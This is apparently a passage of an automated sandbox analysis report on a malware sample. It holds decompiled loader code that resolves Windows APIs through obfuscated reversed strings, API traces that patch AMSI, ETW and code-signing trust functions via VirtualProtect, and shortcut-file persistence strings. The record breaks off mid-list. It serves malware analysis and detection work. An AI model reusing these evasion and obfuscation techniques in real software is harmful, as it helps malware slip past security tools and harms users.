0x035a75b1 0x035a75b3 0x035a75b6 0x035a75b9 0x035a75c9 0x035a75d7 0x035a75e9 0x035a6ce0 0x035a6ce0 0x035a6ce6 0x035a6ceb 0x035a6cf0 0x035a6cf8 0x035a6cfd 0x035a6d02 0x035a6d05 0x035a6d12 0x035a6d24 0x035a6d33 0x00000000 0x035a6d39 0x035a6d39 0x035a6d3f 0x035a6d44 0x035a6d51 0x035a6d63 0x035a6d72 0x035a6d74 0x035a6d7a 0x035a6d7f 0x035a6d8c 0x035a6d9e 0x035a6da6 0x035a6da6 0x035a6dd3 0x035a6de7 0x035a6dee 0x035a6df3 0x035a6dfe 0x035a6e0c 0x035a6e1f 0x035a6e24 0x035a6e31 0x035a6e42 0x035a6e52 0x035a6e5a 0x035a6e61 0x035a6e7c 0x035a6e84 0x035a6e8b 0x035a6e93 0x035a6e9f 0x035a6eb5 0x035a6ec0 0x035a6ec7 0x035a6ee5 0x035a6eea 0x035a6f05 0x035a6f1d 0x035a6f28 0x035a6f2f 0x035a6f34 0x035a6f37 0x035a6f3a 0x035a6f3f 0x035a6f49 0x035a6f49 0x035a6d33 0x035a69f0 0x035a69f0 0x035a69f2 0x035a69f4 0x035a69f5 0x00000000 0x035a69f7 0x035a69f7 0x035a69fe 0x035a6a05 0x035a6a06 0x035a6a0b 0x035a6a0e 0x035a6a16 0x035a6a1b 0x035a6a2a 0x035a6a41 0x035a6a5b 0x035a6a75 0x035a6a8f 0x035a6aa9 0x035a6ac3 0x035a6add 0x035a6b04 0x035a6b09 0x035a6b0e 0x035a6b13 0x035a6b15 0x035a6b2e 0x035a6b38 0x035a6b3e 0x035a6b17 0x035a6b17 0x035a6b21 0x035a6b27 0x035a6b27 0x035a6b4b 0x035a6b58 0x035a6b60 0x035a6b65 0x035a6b72 0x035a6b7a 0x035a6b80 0x035a6b8b 0x035a6b90 0x035a6b9d 0x035a6ba3 0x035a6bad 0x035a6bb6 0x035a6bc0 0x035a6bc9 0x035a6bd3 0x035a6bdc 0x035a6be6 0x035a6bef 0x035a6bf9 0x035a6c02 0x035a6c0c 0x035a6c15 0x035a6c1f 0x035a6c28 0x035a6c32 0x035a6c3b 0x035a6c45 0x035a6c4e 0x035a6c58 0x035a6c61 0x035a6c69 0x035a6c6f 0x035a6c7a 0x035a6c87 0x035a6c8c 0x035a6c91 0x035a6c9d 0x035a6c9f 0x035a6ca9 0x035a6ca9 0x035a6c9d 0x00000000

APIs

LoadLibraryA.KERNEL32(mssip32,00000000,035A75EA,?,?,00000016,00000000,00000000), ref: 035A6A25 GetProcAddress.KERNEL32(00000000,CryptSIPGetRegWorkingFlags), ref: 035A6A32 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,mssip32,00000000,035A75EA,?,?,00000016,00000000,00000000), ref: 035A6A41 GetProcAddress.KERNEL32(00000000,CryptSIPCreateIndirectData), ref: 035A6A4C VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPCreateIndirectData,035A4E54,00000008,00000040,00000000,mssip32,00000000,035A75EA,?,?,00000016), ref: 035A6A5B GetProcAddress.KERNEL32(00000000,CryptSIPGetInfo), ref: 035A6A66 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetInfo,035A4E54,00000008,00000040,00000000,00000000,CryptSIPCreateIndirectData,035A4E54,00000008,00000040,00000000), ref: 035A6A75 GetProcAddress.KERNEL32(00000000,CryptSIPGetSignedDataMsg), ref: 035A6A80 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetSignedDataMsg,035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetInfo,035A4E54,00000008,00000040,00000000), ref: 035A6A8F GetProcAddress.KERNEL32(00000000,CryptSIPPutSignedDataMsg), ref: 035A6A9A VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPPutSignedDataMsg,035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetSignedDataMsg,035A4E54,00000008,00000040,00000000), ref: 035A6AA9 GetProcAddress.KERNEL32(00000000,CryptSIPVerifyIndirectData), ref: 035A6AB4 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54,00000008,00000040,00000000,00000000,CryptSIPPutSignedDataMsg,035A4E54,00000008,00000040,00000000), ref: 035A6AC3 GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 035A6ACE VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54,00000008,00000040,00000000), ref: 035A6ADD Part of subcall function 03592FD8: QueryPerformanceCounter.KERNEL32 ref: 03592FDC Part of subcall function 0359C4D4: GetEnvironmentVariableA.KERNEL32(00000000,?,00000400,?,?,?,00000000,035A6C7F,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008), ref: 0359C4FD CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 035A6E0C

Strings

AmsiOpenSession , xrefs: 035A7451 wuapi , xrefs: 035A72C6 [InternetShortcut] , xrefs: 035A6E55 revreSretsigeRllD , xrefs: 035A72D8 DllRegisterServer , xrefs: 035A74BA, 035A7523 CryptSIPCreateIndirectData , xrefs: 035A6A46 mssip32 , xrefs: 035A6A20 DllCanUnloadNow , xrefs: 035A7569 AmsiInitialize , xrefs: 035A7500 EtwEventWrite , xrefs: 035A73E8 Contacts , xrefs: 035A6CEB, 035A6D44, 035A6D7F, 035A6DB6, 035A6ED5 DllRegisterServer , xrefs: 035A6AC8 CryptSIPGetSignedDataMsg , xrefs: 035A6A7A CryptSIPGetRegWorkingFlags , xrefs: 035A6A2C DllGetClassObject , xrefs: 035A74DD, 035A7546 .exe , xrefs: 035A6DC6 CryptSIPGetInfo , xrefs: 035A6A60 amsiproxy , xrefs: 035A7528, 035A754B, 035A756E, 035A7591 URL=file:" , xrefs: 035A6E64 AddPersonalTrustDBPages , xrefs: 035A70C1 amsi , xrefs: 035A7410, 035A7433, 035A7456, 035A7479, 035A749C, 035A74BF, 035A74E2, 035A7505 DriverInitializePolicy , xrefs: 035A71B8 DllUnregisterServer , xrefs: 035A758C SoftpubCheckCert , xrefs: 035A7161 SoftpubDefCertInit , xrefs: 035A7139 AmsiScanString , xrefs: 035A740B CryptSIPVerifyIndirectData , xrefs: 035A6AAE OfficeInitializePolicy , xrefs: 035A7189 YAK , xrefs: 035A6B46 IconIndex= , xrefs: 035A6EB0 l#w , xrefs: 035A6C69 softpub , xrefs: 035A70C6, 035A70EE, 035A7116, 035A713E, 035A7166, 035A718E softpub , xrefs: 035A71AC AmsiUacInitialize , xrefs: 035A7474 HTTPSCertificateTrust , xrefs: 035A70E9 ntdll , xrefs: 035A73ED AmsiUacScan , xrefs: 035A7497 SoftpubLoadSignature , xrefs: 035A7111 AmsiScanBuffer , xrefs: 035A742E tcejbOssalCteGllD , xrefs: 035A7313 .url , xrefs: 035A6D05, 035A6EF5 CryptSIPPutSignedDataMsg , xrefs: 035A6A94

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProcProtectVirtual$CopyCounterEnvironmentFileLibraryLoadPerformanceQueryVariable String ID: .exe$.url$AddPersonalTrustDBPages$AmsiInitialize$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$Contacts$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetRegWorkingFlags$CryptSIPGetSignedDataMsg$CryptSIPPutSignedDataMsg$CryptSIPVerifyIndirectData$DllCanUnloadNow$DllGetClassObject$DllRegisterServer$DllRegisterServer$DllUnregisterServer$DriverInitializePolicy$EtwEventWrite$HTTPSCertificateTrust$IconIndex=$OfficeInitializePolicy$SoftpubCheckCert$SoftpubDefCertInit$SoftpubLoadSignature$URL=file:"$YAK$[InternetShortcut]$amsi$amsiproxy$l#w$mssip32$ntdll$revreSretsigeRllD$softpub$softpub$tcejbOssalCteGllD$wuapi API String ID: 1105154057-3494343972 Opcode ID: 14d4158cd77cb42502668fc48784e415f3c7b4bbb773364ad0336fe862842fe8 Instruction ID: 054d672b39f7b7c68fe9b7d456803b3166106a1015296b5a4dbc39d07eddf7de Opcode Fuzzy Hash: 14d4158cd77cb42502668fc48784e415f3c7b4bbb773364ad0336fe862842fe8 Instruction Fuzzy Hash: AB324BB8340F4AAFEA10F7ADF851E5D33F1BB89600F104416A5145FB79DAB0AC0ABB55

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E035A6295(void* __eax, void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; char _v44; char _v48; char _v52; char _v56; char _v60; char _v64; char _v68; char _v72; char _v76; char _v80; char _v84; char _v88; char _v92; char _v96; char _v100; char _v104; char _v108; char _v112; char _v116; char _v120; char _v124; char _v128; struct HINSTANCE__* _t199; void* _t226; struct HINSTANCE__* _t227; struct HINSTANCE__* _t228; struct HINSTANCE__* _t229; void* _t230; intOrPtr _t233; intOrPtr _t269; intOrPtr _t270; _t267 = __esi; _t266 = __edi; _t226 = __ebx + __eax - 0x35ad2fc; _t269 = _t270; _t230 = 0xf; do { _push(0); _push(0); _t230 = _t230 - 1; } while (_t230 != 0); _push(_t230); _push(_t226); _push(_t269); _push(0x35a66d6); _push( *[fs:eax]); *[fs:eax] = _t270; *0x35ad370 = *0x35ad370 - 1; _t273 = *0x35ad370; if( *0x35ad370 < 0) { L035A3FD0("kkc-12kdmqdj", _t226, &_v8, __edi, __esi, _t273); _t227 = LoadLibraryA(E035947DC(_v8)); L035A3FD0("c`dqgSdltrdQ", _t227, &_v12, __edi, __esi, _t273); *0x35ad31c = GetProcAddress(_t227, E035947DC(_v12)); L035A3FD0("xqnldLrrdbnqOc`dQ", _t227, &_v16, _t266, _t267, _t273); *0x35ad320 = GetProcAddress(_t227, E035947DC(_v16)); L035A3FD0("xqnldLrrdbnqOdshqV", _t227, &_v20, _t266, _t267, _t273); *0x35ad300 = GetProcAddress(_t227, E035947DC(_v20)); L035A3FD0("swdsmnBc`dqgSsdF", _t227, &_v24, _t266, _t267, _t273); *0x35ad324 = GetProcAddress(_t227, E035947DC(_v24)); L035A3FD0("swdsmnBc`dqgSsdR", _t227, &_v28, _t266, _t267, _t273); *0x35ad318 = GetProcAddress(_t227, E035947DC(_v28)); L035A3FD0("@rrdbnqOds`dqB", _t227, &_v32, _t266, _t267, _t273); *0x35ad328 = GetProcAddress(_t227, E035947DC(_v32)); L035A3FD0("wDbnkk@k`tsqhU", _t227, &_v36, _t266, _t267, _t273); *0x35ad32c = GetProcAddress(_t227, E035947DC(_v36)); L035A3FD0("@dbqtnrdQcmhE", _t227, &_v40, _t266, _t267, _t273); *0x35ad304 = GetProcAddress(_t227, E035947DC(_v40)); L035A3FD0("dbqtnrdQendyhR", _t227, &_v44, _t266, _t267, _t273); *0x35ad308 = GetProcAddress(_t227, E035947DC(_v44)); L035A3FD0("dbqtnrdQc`nK", _t227, &_v48, _t266, _t267, _t273); *0x35ad30c = GetProcAddress(_t227, E035947DC(_v48)); L035A3FD0("dbqtnrdQjbnK", _t227, &_v52, _t266, _t267, _t273); *0x35ad310 = GetProcAddress(_t227, E035947DC(_v52)); L035A3FD0("dbqtnrdQddqE", _t227, &_v56, _t266, _t267, _t273); *0x35ad314 = GetProcAddress(_t227, E035947DC(_v56)); L035A3FD0("@rdl`MdbqtnrdQltmD", _t227, &_v60, _t266, _t267, _t273); *0x35ad330 = GetProcAddress(_t227, E035947DC(_v60)); L035A3FD0("@xqnsbdqhCldsrxRsdF", _t227, &_v64, _t266, _t267, _t273); *0x35ad334 = GetProcAddress(_t227, E035947DC(_v64)); L035A3FD0("@gs`OoldSsdF", _t227, &_v68, _t266, _t267, _t273); *0x35ad338 = GetProcAddress(_t227, E035947DC(_v68)); L035A3FD0("@xqnsbdqhCrvncmhVsdF", _t227, &_v72, _t266, _t267, _t273); *0x35ad33c = GetProcAddress(_t227, E035947DC(_v72)); L035A3FD0("dcnLqnqqDsdR", _t227, &_v76, _t266, _t267, _t273); *0x35ad340 = GetProcAddress(_t227, E035947DC(_v76)); L035A3FD0("@dmhKcm`llnBsdF", _t227, &_v80, _t266, _t267, _t273); *0x35ad344 = GetProcAddress(_t227, E035947DC(_v80)); L035A3FD0("@dkhEdsdkdC", _t227, &_v84, _t266, _t267, _t273); *0x35ad348 = GetProcAddress(_t227, E035947DC(_v84)); L035A3FD0("@dkhEds`dqB", _t227, &_v88, _t266, _t267, _t273); *0x35ad34c = GetProcAddress(_t227, E035947DC(_v88)); L035A3FD0("dkhEc`dQ", _t227, &_v92, _t266, _t267, _t273); *0x35ad350 = GetProcAddress(_t227, E035947DC(_v92)); L035A3FD0("dkhEdshqV", _t227, &_v96, _t266, _t267, _t273); *0x35ad354 = GetProcAddress(_t227, E035947DC(_v96)); L035A3FD0("dkcm`GdrnkB", _t227, &_v100, _t266, _t267, _t273); *0x35ad358 = GetProcAddress(_t227, E035947DC(_v100)); L035A3FD0("qdsmhnOdkhEsdR", _t227, &_v104, _t266, _t267, _t273); *0x35ad35c = GetProcAddress(_t227, E035947DC(_v104)); L035A3FD0("kkc-okgdf`lh", _t227, &_v108, _t266, _t267, _t273); _t199 = LoadLibraryA(E035947DC(_v108)); // executed _t228 = _t199; L035A3FD0("rsrhwDgs`OxqnsbdqhCdqtRdj`L", _t228, &_v112, _t266, _t267, _t273); *0x35ad360 = GetProcAddress(_t228, E035947DC(_v112)); L035A3FD0("kkc-12kkdgr", _t228, &_v116, _t266, _t267, _t273); _t229 = LoadLibraryA(E035947DC(_v116)); L035A3FD0("@dstbdwDkkdgR", _t229, &_v120, _t266, _t267, _t273); *0x35ad364 = GetProcAddress(_t229, E035947DC(_v120)); L035A3FD0("@dka`stbdwDcmhE", _t229, &_v124, _t266, _t267, _t273); *0x35ad368 = GetProcAddress(_t229, E035947DC(_v124)); L035A3FD0("@gs`OqdcknEk`hbdoRsdFGR", _t229, &_v128, _t266, _t267, _t273); *0x35ad36c = GetProcAddress(_t229, E035947DC(_v128)); } _pop(_t233); *[fs:eax] = _t233; _push(E035A66DD); return E03594360( &_v128, 0x1f); } 0x035a6295 0x035a6295 0x035a629a 0x035a629d 0x035a629f 0x035a62a4 0x035a62a4 0x035a62a6 0x035a62a8 0x035a62a8 0x035a62ab 0x035a62ac 0x035a62af 0x035a62b0 0x035a62b5 0x035a62b8 0x035a62bb 0x035a62bb 0x035a62c2 0x035a62d0 0x035a62e3 0x035a62ed 0x035a6301 0x035a630e 0x035a6322 0x035a632f 0x035a6343 0x035a6350 0x035a6364 0x035a6371 0x035a6385 0x035a6392 0x035a63a6 0x035a63b3 0x035a63c7 0x035a63d4 0x035a63e8 0x035a63f5 0x035a6409 0x035a6416 0x035a642a 0x035a6437 0x035a644b 0x035a6458 0x035a646c 0x035a6479 0x035a648d 0x035a649a 0x035a64ae 0x035a64bb 0x035a64cf 0x035a64dc 0x035a64f0 0x035a64fd 0x035a6511 0x035a651e 0x035a6532 0x035a653f 0x035a6553 0x035a6560 0x035a6574 0x035a6581 0x035a6595 0x035a65a2 0x035a65b6 0x035a65c3 0x035a65d7 0x035a65e4 0x035a65f8 0x035a6605 0x035a6613 0x035a6618 0x035a6622 0x035a6636 0x035a6643 0x035a6656 0x035a6660 0x035a6674 0x035a6681 0x035a6695 0x035a66a2 0x035a66b6 0x035a66b6 0x035a66bd 0x035a66c0 0x035a66c3 0x035a66d5

APIs

LoadLibraryA.KERNEL32(00000000,00000000,035A66D6,?,?,0000000E,00000000,00000000), ref: 035A62DE GetProcAddress.KERNEL32(00000000,00000000), ref: 035A62FC GetProcAddress.KERNEL32(00000000,00000000), ref: 035A631D GetProcAddress.KERNEL32(00000000,00000000), ref: 035A633E GetProcAddress.KERNEL32(00000000,00000000), ref: 035A635F GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6380 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63A1 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63C2 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63E3 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6404 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6425 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6446 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6467 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6488 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64A9 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64CA GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64EB GetProcAddress.KERNEL32(00000000,00000000), ref: 035A650C GetProcAddress.KERNEL32(00000000,00000000), ref: 035A652D GetProcAddress.KERNEL32(00000000,00000000), ref: 035A654E GetProcAddress.KERNEL32(00000000,00000000), ref: 035A656F GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6590 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65B1 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65D2 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65F3 LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6613 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6631 LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6651 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A666F GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6690 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A66B1

Strings

swdsmnBc`dqgSsdF , xrefs: 035A634B @dbqtnrdQcmhE , xrefs: 035A63CF dbqtnrdQjbnK , xrefs: 035A6432 @gs`OqdcknEk`hbdoRsdFGR , xrefs: 035A669D @dkhEds`dqB , xrefs: 035A655B @dka`stbdwDcmhE , xrefs: 035A667C @rdl`MdbqtnrdQltmD , xrefs: 035A6474 dkhEc`dQ , xrefs: 035A657C wDbnkk@k`tsqhU , xrefs: 035A63AE dkcm`GdrnkB , xrefs: 035A65BE dkhEdshqV , xrefs: 035A659D xqnldLrrdbnqOdshqV , xrefs: 035A632A dcnLqnqqDsdR , xrefs: 035A64F8 xqnldLrrdbnqOc`dQ , xrefs: 035A6309 @xqnsbdqhCrvncmhVsdF , xrefs: 035A64D7 c`dqgSdltrdQ , xrefs: 035A62E8 @gs`OoldSsdF , xrefs: 035A64B6 kkc-12kkdgr , xrefs: 035A663E dbqtnrdQc`nK , xrefs: 035A6411 dbqtnrdQendyhR , xrefs: 035A63F0 @dstbdwDkkdgR , xrefs: 035A665B @dmhKcm`llnBsdF , xrefs: 035A6519 kkc-okgdf`lh , xrefs: 035A6600 qdsmhnOdkhEsdR , xrefs: 035A65DF dbqtnrdQddqE , xrefs: 035A6453 @xqnsbdqhCldsrxRsdF , xrefs: 035A6495 @dkhEdsdkdC , xrefs: 035A653A kkc-12kdmqdj , xrefs: 035A62CB @rrdbnqOds`dqB , xrefs: 035A638D rsrhwDgs`OxqnsbdqhCdqtRdj`L , xrefs: 035A661D swdsmnBc`dqgSsdR , xrefs: 035A636C

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad String ID: @dbqtnrdQcmhE$@dka`stbdwDcmhE$@dkhEds`dqB$@dkhEdsdkdC$@dmhKcm`llnBsdF$@dstbdwDkkdgR$@gs`OoldSsdF$@gs`OqdcknEk`hbdoRsdFGR$@rdl`MdbqtnrdQltmD$@rrdbnqOds`dqB$@xqnsbdqhCldsrxRsdF$@xqnsbdqhCrvncmhVsdF$c`dqgSdltrdQ$dbqtnrdQc`nK$dbqtnrdQddqE$dbqtnrdQendyhR$dbqtnrdQjbnK$dcnLqnqqDsdR$dkcm`GdrnkB$dkhEc`dQ$dkhEdshqV$kkc-12kdmqdj$kkc-12kkdgr$kkc-okgdf`lh$qdsmhnOdkhEsdR$rsrhwDgs`OxqnsbdqhCdqtRdj`L$swdsmnBc`dqgSsdF$swdsmnBc`dqgSsdR$wDbnkk@k`tsqhU$xqnldLrrdbnqOc`dQ$xqnldLrrdbnqOdshqV API String ID: 2238633743-988113358 Opcode ID: 3b446dd141fdec25e44cff90a661e9dea7204630a88db79e49681c22ef0c1e79 Instruction ID: 3db9b3665fa3da4963f15c0623acd80d0e2130a70bc7a88ac71b6d56e0892bae Opcode Fuzzy Hash: 3b446dd141fdec25e44cff90a661e9dea7204630a88db79e49681c22ef0c1e79 Instruction Fuzzy Hash: E6B193B8A1070AAFDB00FBB9FC9089FB7F8BB84254F144516B4019F635DB745D06ABA1

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E035A629C(void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; char _v44; char _v48; char _v52; char _v56; char _v60; char _v64; char _v68; char _v72; char _v76; char _v80; char _v84; char _v88; char _v92; char _v96; char _v100; char _v104; char _v108; char _v112; char _v116; char _v120; char _v124; char _v128; struct HINSTANCE__* _t197; struct HINSTANCE__* _t224; struct HINSTANCE__* _t225; struct HINSTANCE__* _t226; void* _t227; intOrPtr _t230; intOrPtr _t266; intOrPtr _t267; _t264 = __esi; _t263 = __edi; _t266 = _t267; _t227 = 0xf; do { _push(0); _push(0); _t227 = _t227 - 1; } while (_t227 != 0); _push(_t227); _push(__ebx); _push(_t266); _push(0x35a66d6); _push( *[fs:eax]); *[fs:eax] = _t267; *0x35ad370 = *0x35ad370 - 1; _t269 = *0x35ad370; if( *0x35ad370 < 0) { L035A3FD0("kkc-12kdmqdj", __ebx, &_v8, __edi, __esi, _t269); _t224 = LoadLibraryA(E035947DC(_v8)); L035A3FD0("c`dqgSdltrdQ", _t224, &_v12, __edi, __esi, _t269); *0x35ad31c = GetProcAddress(_t224, E035947DC(_v12)); L035A3FD0("xqnldLrrdbnqOc`dQ", _t224, &_v16, __edi, __esi, _t269); *0x35ad320 = GetProcAddress(_t224, E035947DC(_v16)); L035A3FD0("xqnldLrrdbnqOdshqV", _t224, &_v20, _t263, _t264, _t269); *0x35ad300 = GetProcAddress(_t224, E035947DC(_v20)); L035A3FD0("swdsmnBc`dqgSsdF", _t224, &_v24, _t263, _t264, _t269); *0x35ad324 = GetProcAddress(_t224, E035947DC(_v24)); L035A3FD0("swdsmnBc`dqgSsdR", _t224, &_v28, _t263, _t264, _t269); *0x35ad318 = GetProcAddress(_t224, E035947DC(_v28)); L035A3FD0("@rrdbnqOds`dqB", _t224, &_v32, _t263, _t264, _t269); *0x35ad328 = GetProcAddress(_t224, E035947DC(_v32)); L035A3FD0("wDbnkk@k`tsqhU", _t224, &_v36, _t263, _t264, _t269); *0x35ad32c = GetProcAddress(_t224, E035947DC(_v36)); L035A3FD0("@dbqtnrdQcmhE", _t224, &_v40, _t263, _t264, _t269); *0x35ad304 = GetProcAddress(_t224, E035947DC(_v40)); L035A3FD0("dbqtnrdQendyhR", _t224, &_v44, _t263, _t264, _t269); *0x35ad308 = GetProcAddress(_t224, E035947DC(_v44)); L035A3FD0("dbqtnrdQc`nK", _t224, &_v48, _t263, _t264, _t269); *0x35ad30c = GetProcAddress(_t224, E035947DC(_v48)); L035A3FD0("dbqtnrdQjbnK", _t224, &_v52, _t263, _t264, _t269); *0x35ad310 = GetProcAddress(_t224, E035947DC(_v52)); L035A3FD0("dbqtnrdQddqE", _t224, &_v56, _t263, _t264, _t269); *0x35ad314 = GetProcAddress(_t224, E035947DC(_v56)); L035A3FD0("@rdl`MdbqtnrdQltmD", _t224, &_v60, _t263, _t264, _t269); *0x35ad330 = GetProcAddress(_t224, E035947DC(_v60)); L035A3FD0("@xqnsbdqhCldsrxRsdF", _t224, &_v64, _t263, _t264, _t269); *0x35ad334 = GetProcAddress(_t224, E035947DC(_v64)); L035A3FD0("@gs`OoldSsdF", _t224, &_v68, _t263, _t264, _t269); *0x35ad338 = GetProcAddress(_t224, E035947DC(_v68)); L035A3FD0("@xqnsbdqhCrvncmhVsdF", _t224, &_v72, _t263, _t264, _t269); *0x35ad33c = GetProcAddress(_t224, E035947DC(_v72)); L035A3FD0("dcnLqnqqDsdR", _t224, &_v76, _t263, _t264, _t269); *0x35ad340 = GetProcAddress(_t224, E035947DC(_v76)); L035A3FD0("@dmhKcm`llnBsdF", _t224, &_v80, _t263, _t264, _t269); *0x35ad344 = GetProcAddress(_t224, E035947DC(_v80)); L035A3FD0("@dkhEdsdkdC", _t224, &_v84, _t263, _t264, _t269); *0x35ad348 = GetProcAddress(_t224, E035947DC(_v84)); L035A3FD0("@dkhEds`dqB", _t224, &_v88, _t263, _t264, _t269); *0x35ad34c = GetProcAddress(_t224, E035947DC(_v88)); L035A3FD0("dkhEc`dQ", _t224, &_v92, _t263, _t264, _t269); *0x35ad350 = GetProcAddress(_t224, E035947DC(_v92)); L035A3FD0("dkhEdshqV", _t224, &_v96, _t263, _t264, _t269); *0x35ad354 = GetProcAddress(_t224, E035947DC(_v96)); L035A3FD0("dkcm`GdrnkB", _t224, &_v100, _t263, _t264, _t269); *0x35ad358 = GetProcAddress(_t224, E035947DC(_v100)); L035A3FD0("qdsmhnOdkhEsdR", _t224, &_v104, _t263, _t264, _t269); *0x35ad35c = GetProcAddress(_t224, E035947DC(_v104)); L035A3FD0("kkc-okgdf`lh", _t224, &_v108, _t263, _t264, _t269); _t197 = LoadLibraryA(E035947DC(_v108)); // executed _t225 = _t197; L035A3FD0("rsrhwDgs`OxqnsbdqhCdqtRdj`L", _t225, &_v112, _t263, _t264, _t269); *0x35ad360 = GetProcAddress(_t225, E035947DC(_v112)); L035A3FD0("kkc-12kkdgr", _t225, &_v116, _t263, _t264, _t269); _t226 = LoadLibraryA(E035947DC(_v116)); L035A3FD0("@dstbdwDkkdgR", _t226, &_v120, _t263, _t264, _t269); *0x35ad364 = GetProcAddress(_t226, E035947DC(_v120)); L035A3FD0("@dka`stbdwDcmhE", _t226, &_v124, _t263, _t264, _t269); *0x35ad368 = GetProcAddress(_t226, E035947DC(_v124)); L035A3FD0("@gs`OqdcknEk`hbdoRsdFGR", _t226, &_v128, _t263, _t264, _t269); *0x35ad36c = GetProcAddress(_t226, E035947DC(_v128)); } _pop(_t230); *[fs:eax] = _t230; _push(E035A66DD); return E03594360( &_v128, 0x1f); } 0x035a629c 0x035a629c 0x035a629d 0x035a629f 0x035a62a4 0x035a62a4 0x035a62a6 0x035a62a8 0x035a62a8 0x035a62ab 0x035a62ac 0x035a62af 0x035a62b0 0x035a62b5 0x035a62b8 0x035a62bb 0x035a62bb 0x035a62c2 0x035a62d0 0x035a62e3 0x035a62ed 0x035a6301 0x035a630e 0x035a6322 0x035a632f 0x035a6343 0x035a6350 0x035a6364 0x035a6371 0x035a6385 0x035a6392 0x035a63a6 0x035a63b3 0x035a63c7 0x035a63d4 0x035a63e8 0x035a63f5 0x035a6409 0x035a6416 0x035a642a 0x035a6437 0x035a644b 0x035a6458 0x035a646c 0x035a6479 0x035a648d 0x035a649a 0x035a64ae 0x035a64bb 0x035a64cf 0x035a64dc 0x035a64f0 0x035a64fd 0x035a6511 0x035a651e 0x035a6532 0x035a653f 0x035a6553 0x035a6560 0x035a6574 0x035a6581 0x035a6595 0x035a65a2 0x035a65b6 0x035a65c3 0x035a65d7 0x035a65e4 0x035a65f8 0x035a6605 0x035a6613 0x035a6618 0x035a6622 0x035a6636 0x035a6643 0x035a6656 0x035a6660 0x035a6674 0x035a6681 0x035a6695 0x035a66a2 0x035a66b6 0x035a66b6 0x035a66bd 0x035a66c0 0x035a66c3 0x035a66d5

APIs

LoadLibraryA.KERNEL32(00000000,00000000,035A66D6,?,?,0000000E,00000000,00000000), ref: 035A62DE GetProcAddress.KERNEL32(00000000,00000000), ref: 035A62FC GetProcAddress.KERNEL32(00000000,00000000), ref: 035A631D GetProcAddress.KERNEL32(00000000,00000000), ref: 035A633E GetProcAddress.KERNEL32(00000000,00000000), ref: 035A635F GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6380 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63A1 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63C2 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63E3 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6404 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6425 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6446 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6467 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6488 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64A9 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64CA GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64EB GetProcAddress.KERNEL32(00000000,00000000), ref: 035A650C GetProcAddress.KERNEL32(00000000,00000000), ref: 035A652D GetProcAddress.KERNEL32(00000000,00000000), ref: 035A654E GetProcAddress.KERNEL32(00000000,00000000), ref: 035A656F 